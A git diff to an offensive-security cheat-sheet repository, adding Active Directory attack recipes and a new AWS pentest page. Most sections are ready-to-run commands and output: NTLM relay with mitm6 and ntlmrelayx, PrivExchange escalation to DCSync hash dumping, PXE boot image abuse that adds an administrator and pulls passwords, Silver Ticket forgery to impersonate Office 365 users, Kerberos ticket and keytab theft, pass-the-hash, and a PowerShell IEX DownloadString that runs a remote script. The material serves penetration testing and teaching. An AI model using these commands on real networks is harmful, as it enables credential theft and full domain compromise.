+    [*] Impersonating user 'Administrator' to target SPN 'cifs/dc01-ww2.factory.lan'
+    [*] Using domain controller: DC01-WW2.factory.lan (172.16.42.5)
+    [*] Building S4U2proxy request for service: 'cifs/dc01-ww2.factory.lan'
+    [*] Sending S4U2proxy request
+    [+] S4U2proxy success!
+    [*] base64(ticket.kirbi) for SPN 'cifs/dc01-ww2.factory.lan':
+
+        doIGXDCCBligAwIBBaEDAgEWooIFXDCCBVhhggVUMIIFUKADAgEFoQ0bC0ZBQ1RPUlkuTEFOoicwJaAD
+        AgECoR4wHBsEY2lmcxsUZGMwMS[...]PMIIFC6ADAgESoQMCAQOiggT9BIIE
+        LmZhY3RvcnkubGFu
+
+    [*] Action: Import Ticket
+    [+] Ticket successfully imported!
+    ```
+
+### Relay delegation with mitm6
+
+Prerequisites: 
+- IPv6 enabled (Windows prefers IPV6 over IPv4)
+- LDAP over TLS (LDAPS)
+
+> ntlmrelayx relays the captured credentials to LDAP on the domain controller, uses that to create a new machine account, print the account's name and password and modifies the delegation rights of it.
+
+```powershell
+git clone https://github.com/fox-it/mitm6.git 
+cd /opt/tools/mitm6
+pip install .
+
+mitm6 -hw ws02 -d lab.local --ignore-nofqnd
+ntlmrelayx.py -t ldaps://dc01.lab.local --delegate-access --no-smb-server -wh attacker-wpad
+then use rubeus with s4u to relay the delegation
+```
+
 ### PrivExchange attack
 
-Exchange your privileges for Domain Admin privs by abusing Exchange.
-You need a shell on a user account with a mailbox.
+Exchange your privileges for Domain Admin privs by abusing Exchange.    
+:warning: You need a shell on a user account with a mailbox.
+
+
+1. Exchange server hostname or IP address
+
+    ```bash 
+    pth-net rpc group members "Exchange Servers" -I dc01.domain.local -U domain/username
+    ```
+
+
+2. Relay of the Exchange server authentication and privilege escalation (using ntlmrelayx from Impacket).
+
+    ```powershell
+    ntlmrelayx.py -t ldap://dc01.domain.local --escalate-user username
+    ```
+
+
+3. Subscription to the push notification feature (using privexchange.py or powerPriv), uses the credentials of the current user to authenticate to the Exchange server. Forcing the Exchange server's to send back its NTLMv2 hash to a controlled machine.
 
-1. Subscription to the push notification feature (using privexchange.py or powerPriv), uses the credentials of the current user to authenticate to the Exchange server.
     ```bash
     # https://github.com/dirkjanm/PrivExchange/blob/master/privexchange.py
     python privexchange.py -ah xxxxxxx -u xxxx -d xxxxx
+    python privexchange.py -ah 10.0.0.2 mail01.domain.local -d domain.local -u user_exchange -p pass_exchange
     
     # https://github.com/G0ldenGunSec/PowerPriv 
     powerPriv -targetHost corpExch01 -attackerHost 192.168.1.17 -Version 2016
     ```
 
-2. Relay of the Exchange server authentication and privilege escalation (using ntlmrelayx from Impacket).
-3. Profit using secretdumps from Impacket, the user can now perform a dcsync and get another user's NTLM hash
+4. Profit using secretdumps from Impacket, the user can now perform a dcsync and get another user's NTLM hash
+
     ```bash
     python secretsdump.py xxxxxxxxxx -just-dc
+    python secretsdump.py lab/buff@192.168.0.2 -ntds ntds -history -just-dc-ntlm
+    ```
+
+5. Clean your mess and restore a previous state of the user's ACL
+
+    ```powershell
+    python aclpwn.py --restore ../aclpwn-20190319-125741.restore
     ```
 
 Alternatively you can use the Metasploit module 
 
 [`use auxiliary/scanner/http/exchange_web_server_pushsubscription`](https://github.com/rapid7/metasploit-framework/pull/11420)
 
-### Password spraying
-
-Password spraying refers to the attack method that takes a large number of usernames and loops them with a single password. 
-
-Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing.
+Alternatively you can use an all-in-one tool : Exchange2domain.
 
 ```powershell
-root@kali:~$ ./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt
-root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123
+git clone github.com/Ridter/Exchange2domain 
+python Exchange2domain.py -ah attackterip -ap listenport -u user -p password -d domain.com -th DCip MailServerip
+python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th DCip --just-dc-user krbtgt MailServerip
 ```
 
-Using `crackmapexec` and `mp64` to generate passwords and spray them against SMB services on the network.
+### PXE Boot image attack
+
+PXE allows a workstation to boot from the network by retrieving an operating system image from a server using TFTP (Trivial FTP) protocol. This boot over the network allows an attacker to fetch the image and interact with it.
+
+- Press **[F8]** during the PXE boot to spawn an administrator console on the deployed machine.
+- Press **[SHIFT+F10]** during the initial Windows setup process to bring up a system console, then add a local administrator or dump SAM/SYSTEM registry.
+
+    ```powershell
+    net user hacker Password123! /add
+    net localgroup administrators /add hacker
+    ```
+
+- Extract the pre-boot image (wim files) using [PowerPXE.ps1 (https://github.com/wavestone-cdt/powerpxe)](https://github.com/wavestone-cdt/powerpxe) and dig through it to find default passwords and domain accounts.
+
+    ```powershell
+    # Import the module
+    PS > Import-Module .\PowerPXE.ps1
+
+    # Start the exploit on the Ethernet interface
+    PS > Get-PXEcreds -InterfaceAlias Ethernet
+    PS > Get-PXECreds -InterfaceAlias « lab 0 » 
+
+    # Wait for the DHCP to get an address
+    >> Get a valid IP adress
+    >>> >>> DHCP proposal IP address: 192.168.22.101
+    >>> >>> DHCP Validation: DHCPACK
+    >>> >>> IP address configured: 192.168.22.101
+
+    # Extract BCD path from the DHCP response
+    >> Request BCD File path
+    >>> >>> BCD File path:  \Tmp\x86x64{5AF4E332-C90A-4015-9BA2-F8A7C9FF04E6}.bcd
+    >>> >>> TFTP IP Address:  192.168.22.3
+
+    # Download the BCD file and extract wim files
+    >> Launch TFTP download
+    >>>> Transfer succeeded.
+    >> Parse the BCD file: conf.bcd
+    >>>> Identify wim file : \Boot\x86\Images\LiteTouchPE_x86.wim
+    >>>> Identify wim file : \Boot\x64\Images\LiteTouchPE_x64.wim
+    >> Launch TFTP download
+    >>>> Transfer succeeded.
+
+    # Parse wim files to find interesting data
+    >> Open LiteTouchPE_x86.wim
+    >>>> Finding Bootstrap.ini
+    >>>> >>>> DeployRoot = \\LAB-MDT\DeploymentShare$
+    >>>> >>>> UserID = MdtService
+    >>>> >>>> UserPassword = Somepass1
+    ```
+
+
+### Impersonating Office 365 Users on Azure AD Connect
+
+Prerequisites: 
+
+* Obtain NTLM password hash of the AZUREADSSOACC account
+    ```powershell
+    mimikatz.exe "lsadump::dcsync /user:AZUREADSSOACC$" exit
+    ```
+
+* AAD logon name of the user we want to impersonate (userPrincipalName or mail)
+    ```powershell
+    elrond@contoso.com
+    ```
+
+* SID of the user we want to impersonate
+    ```powershell
+    S-1-5-21-2121516926-2695913149-3163778339-1234
+    ```
+
+
+Create the Silver Ticket and inject it into Kerberos cache:
+```powershell
+mimikatz.exe "kerberos::golden /user:elrond
+/sid:S-1-5-21-2121516926-2695913149-3163778339 /id:1234
+/domain:contoso.local /rc4:f9969e088b2c13d93833d0ce436c76dd
+/target:aadg.windows.net.nsatc.net /service:HTTP /ptt" exit
+```
+
+Launch Mozilla Firefox, go to about:config
+```powershell
+network.negotiate-auth.trusted-uris="https://aadg.windows.net.nsatc.net,https://autologon.microsoftazuread-sso.com".
+```
+
+Navigate to any web application that is integrated with our AAD domain. Once at the Office365 logon screen, fill in the user name, while leaving the password field empty. Then press TAB or ENTER.
+
+
+## Linux Active Directory
+
+### CCACHE ticket reuse from /tmp
+
+List the current ticket used for authentication with `env | grep KRB5CCNAME`. The format is portable and the ticket can be reused by setting the environment variable with `export KRB5CCNAME=/tmp/ticket.ccache`
+
+> When tickets are set to be stored as a file on disk, the standard format and type is a CCACHE file. This is a simple binary file format to store Kerberos credentials. These files are typically stored in /tmp and scoped with 600 permissions
+
+### CCACHE ticket reuse from keyring
+
+Tool to extract Kerberos tickets from Linux kernel keys : https://github.com/TarlogicSecurity/tickey
 
 ```powershell
-crackmapexec smb 10.0.0.1/24 -u Administrator -p `(./mp64.bin Pass@wor?l?a)`
+[root@Lab-LSV01 /]# /tmp/tickey -i
+[*] krb5 ccache_name = KEYRING:session:sess_%{uid}
+[+] root detected, so... DUMP ALL THE TICKETS!!
+[*] Trying to inject in tarlogic[1000] session...
+[+] Successful injection at process 25723 of tarlogic[1000],look for tickets in /tmp/__krb_1000.ccache
+[*] Trying to inject in velociraptor[1120601115] session...
+[+] Successful injection at process 25794 of velociraptor[1120601115],look for tickets in /tmp/__krb_1120601115.ccache
+[*] Trying to inject in trex[1120601113] session...
+[+] Successful injection at process 25820 of trex[1120601113],look for tickets in /tmp/__krb_1120601113.ccache
+[X] [uid:0] Error retrieving tickets
+```
+
+### CCACHE ticket reuse from keytab
+
+```powershell
+git clone https://github.com/its-a-feature/KeytabParser
+python KeytabParser.py /etc/krb5.keytab
+klist -k /etc/krb5.keytab
+```
+
+### Extract accounts from /etc/krb5.keytab
+
+The service keys used by services that run as root are usually stored in the keytab file /etc/krb5.keytab. This service key is the equivalent of the service's password, and must be kept secure. 
+
+Use [`klist`](https://adoptopenjdk.net/?variant=openjdk13&jvmVariant=hotspot) to read the keytab file and parse its content. The key that you see when the [key type](https://cwiki.apache.org/confluence/display/DIRxPMGT/Kerberos+EncryptionKey) is 23  is the actual NT Hash of the user.
+
+```powershell
+$ klist.exe -t -K -e -k FILE:C:\Users\User\downloads\krb5.keytab
+[...]
+[26] Service principal: host/COMPUTER@DOMAIN
+	 KVNO: 25
+	 Key type: 23
+	 Key: 6b3723410a3c54692e400a5862256e0a
+	 Time stamp: Oct 07,  2019 09:12:02
+[...]
+```
+
+On macOS you can use `bifrost`.
+
+```powershell
+./bifrost -action dump -source keytab -path test
+```
+
+Connect to the machine using the account and the hash with CME.
+
+```powershell
+$ crackmapexec 10.XXX.XXX.XXX -u 'COMPUTER$' -H "6b3723410a3c54692e400a5862256e0a" -d "DOMAIN"
+CME          10.XXX.XXX.XXX:445 HOSTNAME-01   [+] DOMAIN\COMPUTER$ 6b3723410a3c54692e400a5862256e0a  
 ```
 
-Most of the time the best passwords to spray are :
 
-- Password1
-- Welcome1
-- $Companyname1
 
 
 ## References
 
-* [https://chryzsh.gitbooks.io/darthsidious/content/compromising-ad.html](https://chryzsh.gitbooks.io/darthsidious/content/compromising-ad.html)
-* [Roasting AS-REPs - January 17, 2017 - harmj0y](https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/)
-* [Top Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition) - Adam Toscher](https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa)
-* [Finding Passwords in SYSVOL & Exploiting Group Policy Preferences](https://adsecurity.org/?p=2288)
-* [Golden ticket - Pentestlab](https://pentestlab.blog/2018/04/09/golden-ticket/)
+* [Impersonating Office 365 Users With Mimikatz - January 15, 2017 - Michael Grafnetter](#https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/)
+* [Abusing Exchange: One API call away from Domain Admin - Dirk-jan Mollema](https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin)
+* [Abusing Kerberos: Kerberoasting - Haboob Team](https://www.exploit-db.com/docs/english/45051-abusing-kerberos---kerberoasting.pdf)
+* [Abusing S4U2Self: Another Sneaky Active Directory Persistence - Alsid](https://alsid.com/company/news/abusing-s4u2self-another-sneaky-active-directory-persistence)
+* [Attacks Against Windows PXE Boot Images - February 13th, 2018 - Thomas Elling](https://blog.netspi.com/attacks-against-windows-pxe-boot-images/)
+* [BUILDING AND ATTACKING AN ACTIVE DIRECTORY LAB WITH POWERSHELL - @myexploit2600 & @5ub34x](https://1337red.wordpress.com/building-and-attacking-an-active-directory-lab-with-powershell/)
+* [Becoming Darth Sidious: Creating a Windows Domain (Active Directory) and hacking it - @chryzsh](https://chryzsh.gitbooks.io/darthsidious/content/building-a-lab/building-a-lab/building-a-small-lab.html)
+* [BlueHat IL - Benjamin Delpy](https://microsoftrnd.co.il/Press%20Kit/BlueHat%20IL%20Decks/BenjaminDelpy.pdf)
+* [COMPROMISSION DES POSTES DE TRAVAIL GRÂCE À LAPS ET PXE MISC n° 103 - mai 2019 - Rémi Escourrou, Cyprien Oger ](https://connect.ed-diamond.com/MISC/MISC-103/Compromission-des-postes-de-travail-grace-a-LAPS-et-PXE)
+* [Chump2Trump - AD Privesc talk at WAHCKon 2017 - @l0ss](https://github.com/l0ss/Chump2Trump/blob/master/ChumpToTrump.pdf)
+* [DiskShadow The return of VSS Evasion Persistence and AD DB extraction](https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/)
+* [Domain Penetration Testing: Using BloodHound, Crackmapexec, & Mimikatz to get Domain Admin](https://hausec.com/2017/10/21/domain-penetration-testing-using-bloodhound-crackmapexec-mimikatz-to-get-domain-admin/)
 * [Dumping Domain Password Hashes - Pentestlab](https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/)
+* [Exploiting MS14-068 with PyKEK and Kali - 14 DEC 2014 - ZACH GRACE @ztgrace](https://zachgrace.com/posts/exploiting-ms14-068/)
+* [Exploiting PrivExchange - April 11, 2019 - @chryzsh](https://chryzsh.github.io/exploiting-privexchange/)
+* [Exploiting Unconstrained Delegation - Riccardo Ancarani - 28 APRIL 2019](https://www.riccardoancarani.it/exploiting-unconstrained-delegation/)
+* [Finding Passwords in SYSVOL & Exploiting Group Policy Preferences](https://adsecurity.org/?p=2288)
+* [Fun with LDAP, Kerberos (and MSRPC) in AD Environments](https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments)
 * [Getting the goods with CrackMapExec: Part 1, by byt3bl33d3r](https://byt3bl33d3r.github.io/getting-the-goods-with-crackmapexec-part-1.html)
 * [Getting the goods with CrackMapExec: Part 2, by byt3bl33d3r](https://byt3bl33d3r.github.io/getting-the-goods-with-crackmapexec-part-2.html)
-* [Domain Penetration Testing: Using BloodHound, Crackmapexec, & Mimikatz to get Domain Admin](https://hausec.com/2017/10/21/domain-penetration-testing-using-bloodhound-crackmapexec-mimikatz-to-get-domain-admin/)
+* [Golden ticket - Pentestlab](https://pentestlab.blog/2018/04/09/golden-ticket/)
+* [How To Pass the Ticket Through SSH Tunnels - bluescreenofjeff](https://bluescreenofjeff.com/2017-05-23-how-to-pass-the-ticket-through-ssh-tunnels/)
+* [Hunting in Active Directory: Unconstrained Delegation & Forests Trusts - Roberto Rodriguez - Nov 28, 2018](https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1)
+* [Invoke-Kerberoast - Powersploit Read the docs](https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/)
+* [Kerberoasting - Part 1 - Mubix “Rob” Fuller](https://room362.com/post/2016/kerberoast-pt1/)
+* [Passing the hash with native RDP client (mstsc.exe)](https://michael-eder.net/post/2018/native_rdp_pass_the_hash/)
 * [Pen Testing Active Directory Environments - Part I: Introduction to crackmapexec (and PowerView)](https://blog.varonis.com/pen-testing-active-directory-environments-part-introduction-crackmapexec-powerview/)
 * [Pen Testing Active Directory Environments - Part II: Getting Stuff Done With PowerView](https://blog.varonis.com/pen-testing-active-directory-environments-part-ii-getting-stuff-done-with-powerview/)
 * [Pen Testing Active Directory Environments - Part III:  Chasing Power Users](https://blog.varonis.com/pen-testing-active-directory-environments-part-iii-chasing-power-users/)
 * [Pen Testing Active Directory Environments - Part IV: Graph Fun](https://blog.varonis.com/pen-testing-active-directory-environments-part-iv-graph-fun/)
 * [Pen Testing Active Directory Environments - Part V: Admins and Graphs](https://blog.varonis.com/pen-testing-active-directory-v-admins-graphs/)
 * [Pen Testing Active Directory Environments - Part VI: The Final Case](https://blog.varonis.com/pen-testing-active-directory-part-vi-final-case/)
-* [Passing the hash with native RDP client (mstsc.exe)](https://michael-eder.net/post/2018/native_rdp_pass_the_hash/)
-* [Fun with LDAP, Kerberos (and MSRPC) in AD Environments](https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments)
-* [DiskShadow The return of VSS Evasion Persistence and AD DB extraction](https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/)
-* [How To Pass the Ticket Through SSH Tunnels - bluescreenofjeff](https://bluescreenofjeff.com/2017-05-23-how-to-pass-the-ticket-through-ssh-tunnels/)
+* [Penetration Testing Active Directory, Part I - March 5, 2019 - Hausec](https://hausec.com/2019/03/05/penetration-testing-active-directory-part-i/)
+* [Penetration Testing Active Directory, Part II - March 12, 2019 - Hausec](https://hausec.com/2019/03/12/penetration-testing-active-directory-part-ii/)
+* [Post-OSCP Series Part 2 - Kerberoasting - 16 APRIL 2019 - Jon Hickman](https://0metasecurity.com/post-oscp-part-2/)
+* [Quick Guide to Installing Bloodhound in Kali-Rolling - James Smith](https://stealingthe.network/quick-guide-to-installing-bloodhound-in-kali-rolling/)
+* [Red Teaming Made Easy with Exchange Privilege Escalation and PowerPriv - Thursday, January 31, 2019 - Dave](http://blog.redxorblue.com/2019/01/red-teaming-made-easy-with-exchange.html)
+* [Roasting AS-REPs - January 17, 2017 - harmj0y](https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/)
+* [Top Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition) - Adam Toscher](https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa)
+* [Using bloodhound to map the user network - Hausec](https://hausec.com/2017/10/26/using-bloodhound-to-map-the-user-network/)
+* [WHAT’S SPECIAL ABOUT THE BUILTIN ADMINISTRATOR ACCOUNT? - 21/05/2012 - MORGAN SIMONSEN](https://morgansimonsen.com/2012/05/21/whats-special-about-the-builtin-administrator-account-12/)
 * [WONKACHALL AKERVA NDH2018 – WRITE UP PART 1](https://akerva.com/blog/wonkachall-akerva-ndh-2018-write-up-part-1/)
 * [WONKACHALL AKERVA NDH2018 – WRITE UP PART 2](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-2/)
 * [WONKACHALL AKERVA NDH2018 – WRITE UP PART 3](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-3/)
 * [WONKACHALL AKERVA NDH2018 – WRITE UP PART 4](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-4/)
 * [WONKACHALL AKERVA NDH2018 – WRITE UP PART 5](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-5/)
-* [BlueHat IL - Benjamin Delpy](https://microsoftrnd.co.il/Press%20Kit/BlueHat%20IL%20Decks/BenjaminDelpy.pdf)
-* [Quick Guide to Installing Bloodhound in Kali-Rolling - James Smith](https://stealingthe.network/quick-guide-to-installing-bloodhound-in-kali-rolling/)
-* [Using bloodhound to map the user network - Hausec](https://hausec.com/2017/10/26/using-bloodhound-to-map-the-user-network/)
-* [Penetration Testing Active Directory, Part I - March 5, 2019 - Hausec](https://hausec.com/2019/03/05/penetration-testing-active-directory-part-i/)
-* [Penetration Testing Active Directory, Part II - March 12, 2019 - Hausec](https://hausec.com/2019/03/12/penetration-testing-active-directory-part-ii/)
-* [Abusing Kerberos: Kerberoasting - Haboob Team](https://www.exploit-db.com/docs/english/45051-abusing-kerberos---kerberoasting.pdf)
-* [Invoke-Kerberoast - Powersploit Read the docs](https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/)
-* [Kerberoasting - Part 1 - Mubix “Rob” Fuller](https://room362.com/post/2016/kerberoast-pt1/)
+* [Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory - 28 January 2019 - Elad Shami](https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html)
 * [[PrivExchange] From user to domain admin in less than 60sec ! - davy](http://blog.randorisec.fr/privexchange-from-user-to-domain-admin-in-less-than-60sec/)
-* [Abusing Exchange: One API call away from Domain Admin - Dirk-jan Mollema](https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin)
-* [Red Teaming Made Easy with Exchange Privilege Escalation and PowerPriv - Thursday, January 31, 2019 - Dave](http://blog.redxorblue.com/2019/01/red-teaming-made-easy-with-exchange.html)
-* [Chump2Trump - AD Privesc talk at WAHCKon 2017 - @l0ss](https://github.com/l0ss/Chump2Trump/blob/master/ChumpToTrump.pdf)
-* [Post-OSCP Series Part 2 - Kerberoasting - 16 APRIL 2019 - Jon Hickman](https://0metasecurity.com/post-oscp-part-2/)
\ No newline at end of file
+* [Pass-the-Hash Is Dead: Long Live LocalAccountTokenFilterPolicy - March 16, 2017 - harmj0y](http://www.harmj0y.net/blog/redteaming/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy/)
+* [Kerberos (II): How to attack Kerberos? - June 4, 2019 - ELOY PÉREZ](https://www.tarlogic.com/en/blog/how-to-attack-kerberos/)
+* [Attacking Read-Only Domain Controllers (RODCs) to Own Active Directory -  Sean Metcalf](https://adsecurity.org/?p=3592)
+* [All you need to know about Keytab files - Pierre Audonnet [MSFT] - January 3, 2018](https://blogs.technet.microsoft.com/pie/2018/01/03/all-you-need-to-know-about-keytab-files/)
+* [Taming the Beast Assess Kerberos-Protected Networks - Emmanuel Bouillon](https://www.blackhat.com/presentations/bh-europe-09/Bouillon/BlackHat-Europe-09-Bouillon-Taming-the-Beast-Kerberous-slides.pdf)
+* [Playing with Relayed Credentials - June 27, 2018](https://www.secureauth.com/blog/playing-relayed-credentials)
+* [Exploiting CVE-2019-1040 - Combining relay vulnerabilities for RCE and Domain Admin - Dirk-jan Mollema](https://dirkjanm.io/exploiting-CVE-2019-1040-relay-vulnerabilities-for-rce-and-domain-admin/)
+* [Drop the MIC - CVE-2019-1040 - Marina Simakov - Jun 11, 2019](https://blog.preempt.com/drop-the-mic)
+* [How to build a SQL Server Virtual Lab with AutomatedLab in Hyper-V - October 30, 2017 - Craig Porteous](https:/www.sqlshack.com/build-sql-server-virtual-lab-automatedlab-hyper-v/)
+* [SMB Share – SCF File Attacks - December 13, 2017 - @netbiosX](pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/)
+* [Escalating privileges with ACLs in Active Directory - April 26, 2018 - Rindert Kramer and Dirk-jan Mollema](https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/)
+* [A Red Teamer’s Guide to GPOs and OUs - APRIL 2, 2018 - @_wald0](https://wald0.com/?p=179)
+* [Carlos Garcia - Rooted2019 - Pentesting Active Directory Forests public.pdf](https://www.dropbox.com/s/ilzjtlo0vbyu1u0/Carlos%20Garcia%20-%20Rooted2019%20-%20Pentesting%20Active%20Directory%20Forests%20public.pdf?dl=0)
+* [Kerberosity Killed the Domain: An Offensive Kerberos Overview - Ryan Hausknecht - Mar 10](https://posts.specterops.io/kerberosity-killed-the-domain-an-offensive-kerberos-overview-eb04b1402c61)
\ No newline at end of file
diff --git a/Methodology and Resources/Cloud - AWS Pentest.md b/Methodology and Resources/Cloud - AWS Pentest.md
new file mode 100644
index 00000000..2342c2b7
--- /dev/null
+++ b/Methodology and Resources/Cloud - AWS Pentest.md	
@@ -0,0 +1,611 @@
+# AWS 
+
+> Amazon Web Services offers reliable, scalable, and inexpensive cloud computing services.
+
+## Summary
+
+* [Training](#training)
+* [Tools](#tools)
+* [AWS - Patterns](#aws---patterns)
+* [AWS - Metadata SSRF](#aws---metadata-ssrf)
+  * [Method for Elastic Cloud Compute (EC2)](#method-for-elastic-cloud-compute-ec2)
+  * [Method for Container Service (Fargate)](#method-for-container-service-fargate)
+* [AWS - Shadow Admin](#aws---shadow-admin)
+  * [Admin equivalent permission](#admin-equivalent-permission)
+* [AWS - Gaining AWS Console Access via API Keys](#aws---gaining-aws-console-access-via-api-keys)
+* [AWS - Mount EBS volume to EC2 Linux](#aws---mount-ebs-volume-to-ec2-linux)
+* [AWS - Copy EC2 using AMI Image](#aws---copy-ec2-using-ami-image)
+* [AWS - Instance Connect - Push an SSH key to EC2 instance](#aws---instance-connect---push-an-ssh-key-to-ec2-instance)
+* [AWS - Lambda - Extract function's code](#aws---lambda---extract-functions-code)
+* [AWS - SSM - Command execution](#aws---ssm---command-execution)
+* [AWS - Golden SAML Attack](#aws---golden-saml-attack)
+* [AWS - Shadow Copy Attack](#aws---shadow-copy-attack)
+* [Cover tracks by obfuscating Cloudtrail logs and Guard Duty](#cover-tracks-by-obfuscating-cloudtrail-logs-and-guard-duty)
+  * [PenTest:IAMUser/KaliLinux](#)
+  * [PenTest:IAMUser/ParrotLinux](#)
+  * [PenTest:IAMUser/PentooLinux](#)
+* [Security checks](#security-checks)
+* [References](#references)
+
+## Training
+
+* Damn Vulnerable Cloud Application - https://medium.com/poka-techblog/privilege-escalation-in-the-cloud-from-ssrf-to-global-account-administrator-fd943cf5a2f6
+* SadCloud - https://github.com/nccgroup/sadcloud
+* Flaws - http://flaws.cloud
+
+## Tools
+
+* **SkyArk** - Discover the most privileged users in the scanned AWS environment - including the AWS Shadow Admins.   
+    Require:
+    - Read-Only permissions over IAM service
+
+    ```powershell
+    $ git clone https://github.com/cyberark/SkyArk
+    $ powershell -ExecutionPolicy Bypass -NoProfile
+    PS C> Import-Module .\SkyArk.ps1 -force
+    PS C> Start-AWStealth
+
+    or in the Cloud Console
+
+    PS C> IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cyberark/SkyArk/master/AWStealth/AWStealth.ps1')  
+    PS C> Scan-AWShadowAdmins  
+    ```
+
+* **Pacu** - Pacu allows penetration testers to exploit configuration flaws within an AWS environment using an extensible collection of modules with a diverse feature-set.    
+    Require:
+    - AWS Keys
+
+    ```powershell
+    $ git clone https://github.com/RhinoSecurityLabs/pacu
+    $ bash install.sh
+    $ python3 pacu.py
+    set_keys/swap_keys
+    ls
+    run <module_name> [--keyword-arguments]
+    run <module_name> --regions eu-west-1,us-west-1
+
+    # https://github.com/RhinoSecurityLabs/pacu/wiki/Module-Details
+    ```
+
+* **Prowler** : AWS Security Best Practices Assessment, Auditing, Hardening and Forensics Readiness Tool. It follows guidelines of the CIS Amazon Web Services Foundations Benchmark and DOZENS of additional checks including GDPR and HIPAA (+100).    
+    Require:
+    - arn:aws:iam::aws:policy/SecurityAudit
+
+    ```powershell
+    $ pip install awscli ansi2html detect-secrets
+    $ git clone https://github.com/toniblyx/prowler
+    $ sudo apt install jq
+    $ ./prowler -E check42,check43
+    $ ./prowler -p custom-profile -r us-east-1 -c check11
+    $ ./prowler -A 123456789012 -R ProwlerRole  # sts assume-role
+    ```
+
+* **Principal Mapper** : A tool for quickly evaluating IAM permissions in AWS
+    ```powershell
+    https://github.com/nccgroup/PMapper
+    pip install principalmapper
+    pmapper graph --create
+    pmapper visualize --filetype png
+    pmapper analysis --output-type text
+
+    # Determine if PowerUser can escalate privileges
+    pmapper query "preset privesc user/PowerUser"
+    pmapper argquery --principal user/PowerUser --preset privesc
+
+    # Find all principals that can escalate privileges
+    pmapper query "preset privesc *"
+    pmapper argquery --principal '*' --preset privesc
+
+    # Find all principals that PowerUser can access
+    pmapper query "preset connected user/PowerUser *"
+    pmapper argquery --principal user/PowerUser --resource '*' --preset connected
+
+    # Find all principals that can access PowerUser
+    pmapper query "preset connected * user/PowerUser"
+    pmapper argquery --principal '*' --resource user/PowerUser --preset connected
+    ```
+
+* **ScoutSuite** : https://github.com/nccgroup/ScoutSuite/wiki
+    ```powershell
+    $ git clone https://github.com/nccgroup/ScoutSuite
+    $ python scout.py PROVIDER --help
+    # The --session-token is optional and only used for temporary credentials (i.e. role assumption).
+    $ python scout.py aws --access-keys --access-key-id <AKIAIOSFODNN7EXAMPLE> --secret-access-key <wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY> --session-token <token>
+    $ python scout.py azure --cli
+    ```
+
+* **weirdAAL** : AWS Attack Library https://github.com/carnal0wnage/weirdAAL/wiki
+    ```powershell
+    python3 weirdAAL.py -m ec2_describe_instances -t demo
+    python3 weirdAAL.py -m lambda_get_account_settings -t demo
+    python3 weirdAAL.py -m lambda_get_function -a 'MY_LAMBDA_FUNCTION','us-west-2' -t yolo
+    ```
+
+* **cloudmapper** : CloudMapper helps you analyze your Amazon Web Services (AWS) environments.
+    ```powershell
+    git clone https://github.com/duo-labs/cloudmapper.git
+    # sudo yum install autoconf automake libtool python3-devel.x86_64 python3-tkinter python-pip jq awscli
+    # You may additionally need "build-essential"
+    sudo apt-get install autoconf automake libtool python3.7-dev python3-tk jq awscli
+    pipenv install --skip-lock
+    pipenv shell
+    report: Generate HTML report. Includes summary of the accounts and audit findings.
+    iam_report: Generate HTML report for the IAM information of an account.
+    audit: Check for potential misconfigurations.
+    collect: Collect metadata about an account.
+    find_admins: Look at IAM policies to identify admin users and roles, or principals with specific privileges
+    ```
+
+## AWS Patterns
+| Service                                  | URL |
+|-------------|--------|
+| s3 | https://{user_provided}.s3.amazonaws.com |
+| cloudfront | https://{random_id}.cloudfront.net |
+| ec2 | ec2-{ip-seperated}.compute-1.amazonaws.com |
+| es | https://{user_provided}-{random_id}.{region}.es.amazonaws.com |
+| elb |	http://{user_provided}-{random_id}.{region}.elb.amazonaws.com:80/443 |
+| elbv2 | https://{user_provided}-{random_id}.{region}.elb.amazonaws.com |
+| rds | mysql://{user_provided}.{random_id}.{region}.rds.amazonaws.com:3306 |
+| rds | postgres://{user_provided}.{random_id}.{region}.rds.amazonaws.com:5432 |
+| route 53 | {user_provided} |
+| execute-api | https://{random_id}.execute-api.{region}.amazonaws.com/{user_provided} |
+| cloudsearch | https://doc-{user_provided}-{random_id}.{region}.cloudsearch.amazonaws.com |
+| transfer | sftp://s-{random_id}.server.transfer.{region}.amazonaws.com |
+| iot | mqtt://{random_id}.iot.{region}.amazonaws.com:8883 |
+| iot | https://{random_id}.iot.{region}.amazonaws.com:8443 |
+| iot | https://{random_id}.iot.{region}.amazonaws.com:443 |
+| mq | https://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:8162 |
+| mq | ssl://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:61617 |
